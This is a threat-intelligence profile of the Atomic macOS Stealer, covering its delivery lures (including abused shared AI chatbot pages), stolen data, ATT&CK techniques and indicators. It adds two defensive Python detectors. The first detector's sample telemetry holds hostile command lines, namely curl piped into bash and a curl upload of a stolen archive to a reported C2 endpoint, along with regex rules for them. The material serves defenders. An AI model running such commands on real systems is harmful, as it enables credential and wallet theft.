Atomic Stealer
Atomic macOS Stealer (AMOS), also called Atomic Stealer, is a macOS-specific information stealer and malware-as-a-service offering documented since 2023. It is sold in criminal channels on a subscription basis, with reporting citing prices from $1,000 to $3,000 per month and operator support features such as victim panels, DMG installers, and ongoing feature updates. AMOS has been distributed through malvertising, compromised websites, fake software installers, poisoned search results, fake ChatGPT/OpenAI download pages, fake Homebrew sites, cracked-app lures, and ClickFix-style social engineering that tricks users into pasting malicious commands into Terminal or executing AppleScript via Script Editor. Reported delivery infrastructure and lures include openew[.]app, homabrews[.]org, slack[.]trialap[.]com, sphereou[.]com, and shared ChatGPT or Claude pages.
AMOS is designed to steal high-value data from macOS systems. Across the reporting, it is described as stealing macOS login passwords via fake prompts and local validation with dscl . -authonly, Keychain data, browser credentials, cookies, autofill data, credit card data, browser history, local session tokens, Firefox and Chromium-family browser data, Safari data, Apple Notes, Telegram session data, Discord tokens, iCloud-related data, OpenVPN profiles, system information, and files from Desktop and Documents. It also targets cryptocurrency data extensively, including standalone wallets and wallet directories such as Ledger Live, Trezor Suite, Exodus, Electrum, Sparrow, Atomic, Binance, Coinomi, and numerous browser wallet extensions. Multiple reports state that some AMOS variants search for wallet- and secret-related files such as .wallet, .seed, .key, and .kdbx.
Observed behavior includes execution from DMG-delivered apps or shell/AppleScript loaders, use of long obfuscated AppleScript chains, Base64/Gzip decoding, in-memory execution, quarantine removal with xattr, anti-analysis and virtualization checks via system_profiler or AppleScript, host enumeration, staging stolen data in /tmp directories, compression into ZIP archives such as /tmp/out.zip, and exfiltration over HTTP or HTTPS to hardcoded servers. Reported exfiltration and C2 indicators include amos-malware[.]ru, hxxp://amos-malware[.]ru/sendlog, 5.42.65[.]108, 38.244.158[.]56/contact, and 45.94.47[.]204 API endpoints. Some reporting also states that AMOS can send stolen logs to Telegram.
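The behaviors listed above (dscl-based password validation, xattr quarantine removal, curl piped into a shell, inline decoding, ZIP staging under /tmp, plist writes, and contact with the reported C2 hosts) are individually noisy but distinctive as a chain. The following Python is an added detection example written for this page; it is not code from the page or from any vendor named in the reporting. It assumes a process-telemetry schema of one dict per event with `session`, `pid`, `cmdline` and `remote_host` fields, and the rule weights and threshold are this example's own heuristic. The telemetry is constructed inline; the only real indicators in it are the defanged hosts already named above.

```python
import re
from collections import defaultdict

# Network indicators named in the reporting above, kept defanged in source.
REPORTED_C2 = ("amos-malware[.]ru", "5.42.65[.]108", "38.244.158[.]56", "45.94.47[.]204")

def refang(ioc: str) -> str:
    """Turn a defanged indicator back into the host string telemetry will contain."""
    return ioc.replace("[.]", ".")

# (rule name, pattern over the process command line, weight).
# The weights are this example's own heuristic, not a published scoring scheme.
RULES = (
    ("local_password_validation", re.compile(r"\bdscl\s+\.\s+-authonly\b"), 5),
    ("quarantine_removal", re.compile(r"\bxattr\s+(-cr?\b|-d\s+com\.apple\.quarantine)"), 3),
    ("curl_pipe_shell", re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"), 4),
    ("inline_decode", re.compile(r"\bbase64\s+(-d|-D|--decode)\b|\bgunzip\b"), 2),
    ("tmp_archive_staging", re.compile(r"\bzip\b.*\s/tmp/\S+\.zip\b"), 3),
    ("launch_plist_write", re.compile(r"/Library/Launch(Daemons|Agents)/\S+\.plist"), 3),
    ("hw_profile_query", re.compile(r"\bsystem_profiler\b"), 1),
)

def match_rules(cmdline: str):
    """Return (rule name, weight) for every rule whose pattern appears in the command line."""
    return [(name, weight) for name, pattern, weight in RULES if pattern.search(cmdline)]

def is_reported_c2(host) -> bool:
    """True when the host equals, or is a subdomain of, one of the reported indicators."""
    if not host:
        return False
    return any(host == refang(i) or host.endswith("." + refang(i)) for i in REPORTED_C2)

def triage(events, threshold: int = 6):
    """Sum rule weights per login session so a chain of individually weak signals
    (decode, xattr, zip) still crosses the threshold; return only sessions at or above it."""
    sessions = defaultdict(lambda: {"score": 0, "hits": []})
    for ev in events:
        s = sessions[ev["session"]]
        for name, weight in match_rules(ev["cmdline"]):
            s["score"] += weight
            s["hits"].append((ev["pid"], name))
        if is_reported_c2(ev.get("remote_host")):
            s["score"] += 5
            s["hits"].append((ev["pid"], "reported_c2_contact"))
    return {k: v for k, v in sessions.items() if v["score"] >= threshold}

# Constructed telemetry, not a real capture. Hostnames ending in .invalid are placeholders.
SAMPLE_EVENTS = [
    # A developer session: one quarantine removal on their own build, one plain download.
    {"session": "dev-1", "pid": 501, "cmdline": "xattr -d com.apple.quarantine ./build/mytool", "remote_host": None},
    {"session": "dev-1", "pid": 502, "cmdline": "curl -O https://example.com/sdk.tar.gz", "remote_host": "example.com"},
    # A session shaped like the ClickFix chain described above.
    {"session": "user-7", "pid": 801, "cmdline": "bash -c 'curl -s https://update.example.invalid/i | bash'", "remote_host": "update.example.invalid"},
    {"session": "user-7", "pid": 802, "cmdline": "dscl . -authonly jdoe ********", "remote_host": None},
    {"session": "user-7", "pid": 803, "cmdline": "xattr -c /tmp/.helper", "remote_host": None},
    {"session": "user-7", "pid": 804, "cmdline": "zip -r /tmp/out.zip /tmp/.staging", "remote_host": None},
    {"session": "user-7", "pid": 805, "cmdline": "curl -F log=@/tmp/out.zip http://amos-malware.ru/sendlog", "remote_host": "amos-malware.ru"},
]

if __name__ == "__main__":
    for session, result in triage(SAMPLE_EVENTS).items():
        print(session, result["score"], result["hits"])
```

Scoring per session rather than per process is the point: the developer session trips one rule (quarantine removal) and stays below the threshold, while the ClickFix-shaped session accumulates a high score before the C2 contact is even considered. In production the session key would come from the audit session ID or login UID in your EDR telemetry.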
Several reports describe post-theft cryptocurrency-focused tampering: AMOS variants download trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite, attempt to delete legitimate wallet applications, and replace them with attacker-controlled versions, sometimes using sudo after capturing the victim’s password. Persistence has been observed via LaunchAgents or LaunchDaemons and plist files such as /Library/LaunchDaemons/com.finder.helper.plist, with helper files stored in user directories.
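A persistence entry like the reported /Library/LaunchDaemons/com.finder.helper.plist with its helper stored in a user directory can be found by auditing the launch plists themselves. The following Python is an added example for this page, not code from the page or from any vendor it cites; the label prefixes, directory list and rule names are this example's own heuristics, and the two plists are constructed to model the reported pattern rather than copied from a sample.

```python
import plistlib
from pathlib import Path, PurePosixPath

# Heuristics for this example; they are not a published rule set.
# Label prefixes a third-party plist under /Library should not normally carry.
IMITATED_PREFIXES = ("com.apple.", "com.finder.")
# Directories a root daemon's executable should never be loaded from.
USER_WRITABLE_ROOTS = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
SCRIPT_INTERPRETERS = {"sh", "bash", "zsh", "osascript"}

def audit_launch_plist(plist_bytes: bytes, plist_path: str):
    """Return a list of (rule, detail) findings for one LaunchDaemon/LaunchAgent plist."""
    d = plistlib.loads(plist_bytes)
    findings = []
    label = str(d.get("Label", ""))
    args = d.get("ProgramArguments") or ([d["Program"]] if "Program" in d else [])
    args = [str(a) for a in args]
    program = args[0] if args else ""
    if label.startswith(IMITATED_PREFIXES):
        findings.append(("imitated_label", f"{label!r} in {plist_path}"))
    if program.startswith(USER_WRITABLE_ROOTS):
        findings.append(("user_writable_program", program))
    if PurePosixPath(program).name in SCRIPT_INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        # An interpreter with an inline script body, the shape of a shell/AppleScript loader.
        findings.append(("inline_script", " ".join(args)))
    if plist_path.startswith("/Library/LaunchDaemons/") and d.get("RunAtLoad") and findings:
        # A root job that starts at boot and already has a finding is the highest-priority case.
        findings.append(("root_runatload", plist_path))
    return findings

def audit_directory(directory: str):
    """Audit every .plist in a directory such as /Library/LaunchDaemons; returns {path: findings}."""
    results = {}
    for p in sorted(Path(directory).glob("*.plist")):
        try:
            findings = audit_launch_plist(p.read_bytes(), str(p))
        except (plistlib.InvalidFileException, OSError) as exc:
            findings = [("unreadable", str(exc))]
        if findings:
            results[str(p)] = findings
    return results

# Constructed plists modelled on the reported persistence: a daemon labelled like a
# Finder component whose executable sits under a user's home directory.
SUSPECT_PLIST = plistlib.dumps({
    "Label": "com.finder.helper",
    "ProgramArguments": ["/Users/jdoe/Library/.helper", "--quiet"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "org.example.backupagent",
    "ProgramArguments": ["/usr/local/bin/backupagent", "--daemon"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    print(audit_launch_plist(SUSPECT_PLIST, "/Library/LaunchDaemons/com.finder.helper.plist"))
    print(audit_launch_plist(BENIGN_PLIST, "/Library/LaunchDaemons/org.example.backupagent.plist"))
    for path, findings in audit_directory("/Library/LaunchDaemons").items():
        print(path, findings)
```

Running `audit_directory` over /Library/LaunchDaemons, /Library/LaunchAgents and each user's ~/Library/LaunchAgents on a Mac gives a quick triage list; expect to maintain an allowlist for vendor software that legitimately loads from a user-writable path, because the heuristic flags location, not intent.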
AMOS is consistently associated with macOS-focused cybercrime rather than a named state actor. It appears in multi-actor ecosystems and has influenced or been forked into related malware families; the tracked reporting states that Poseidon Stealer was forked from AMOS and later rebranded as Odyssey, and that SHub/Reaper incorporated document-theft functionality similar to AMOS. Known aliases in the tracked reporting include Atomic macOS Stealer, Atomic Stealer, and Shamos/SHAMOS. Reported sample hashes include 15f39e53a2b4fa01f2c39ad29c7fe4c2fef6f24eff6fa46b8e77add58e7ac709, 18bc97e3f68864845c719754d2d667bb03f754f6e87428e33f9c763a8e6a704a, and c0919e1999eaee67e67aeda0287722775afb04e9a9a0f727928b4d11265fb70b.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"A critical remote code execution (RCE) vulnerability, identified as CVE-2025-55182 and dubbed React2Shell, exists within the React Server Components (RSC) architecture, allowing unauthenticated attackers to execute arbitrary code..."
The campaign coincides with the disclosure of a high-severity OpenClaw vulnerability (CVE-2026-25253) that enables one-click remote code execution through token exfiltration and WebSocket hijacking. Although patched in late January 2026, the flaw points to the platform’s growing attack surface.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Odyssey isn’t original work. It’s a direct rebrand of Poseidon Stealer, which itself was forked from Atomic macOS Stealer (AMOS).
Two new AMOS (Atomic macOS Stealer) samples uploaded to MalwareBazaar reveal a significant evolution of the macOS stealer family.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Last year, we documented malware distribution campaigns both via malvertising and compromised sites delivering Atomic Stealer (AMOS) onto Mac users... on January 8, we identified a malvertising campaign... The threat actors are luring victims via a Google search ad impersonating Slack
Initial Access
3 techniques
...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Victims are directed to high-fidelity, deceptive web interfaces that simulate legitimate services.
A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware... The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS.
Execution
7 techniques
Initial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.
ClickFix variant that uses the applescript:// URL scheme to invoke the macOS Script Editor... This URL-encoded hyperlink runs a dual-track routine... while silently executing the curl command in the background to deliver an infostealer, bypassing Gatekeeper via user-coerced interaction.
containing a curl command that downloads and executes malware.
Clicking the Windows download delivers a fake installer... Clicking the macOS button delivers malware... When the victim runs the installer...
Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.
The earliest examples used shared Claude.ai conversations disguised as installation guides... that walked users through opening a terminal and pasting a curl command that downloaded and executed an infostealer.
Persistence
2 techniques
...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Privilege Escalation
2 techniques
...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Stealth
5 techniques
It looks like Atomic Stealer was updated around mid to late December 2023, where its developers introduced payload encryption in an effort to bypass detection rules... using a new encryption routine that hides strings of interest
Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.
...a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” ... If it matches, the malware captures the user’s login password in cleartext.
Credential Access
8 techniques
...if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.
Instead of logging keystrokes, the malware displays deceptive dialog boxes requesting the user’s credentials.
Exfiltration efforts focus on high-value data, including ... messaging session tokens (Telegram/Discord)
It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data.
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox), macOS Keychains
Subsequent stages often involve a native-looking password prompt to facilitate credential harvesting under the guise of installation continuity.
Discovery
2 techniques
It also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet, .seed, .key, and .kdbx.
Collection
4 techniques
This will allow Atomic Stealer to collect passwords and other sensitive files that are typically access-restricted... Stealing victim passwords, crypto wallets and cookies
...if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.
Instead of logging keystrokes, the malware displays deceptive dialog boxes requesting the user’s credentials.
The collected data is compressed into a temporary archive and sent to a hardcoded server.
Command and Control
1 technique
Initial commands leverage curl to fetch obfuscated payloads
Exfiltration
1 technique
When we analyzed this sample in a sandbox we saw the data exfiltration taking place and the corresponding C2 server
Other
1 technique
IOCs tracked for this family
279 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
137 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A macOS infostealer delivered via ClickFix social-engineering lures. It is used to steal high-value data such as browser credentials, Keychain data, messaging tokens, notes, and cryptocurrency wallet information.
A macOS infostealer delivered through malicious shared AI chatbot conversations that socially engineer users into pasting terminal commands.
macOS infostealer that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallet data, keychain contents, and sensitive files. It also captures the user’s login password and can replace legitimate Ledger and Trezor wallet applications with trojanized versions.
macOS infostealer that captures login passwords, copies keychain data, harvests browser cookies and saved logins, extracts Telegram sessions, scans cryptocurrency wallet directories, searches for wallet/seed/key files, exfiltrates collected data, and can replace legitimate Ledger and Trezor wallet apps with trojanized versions.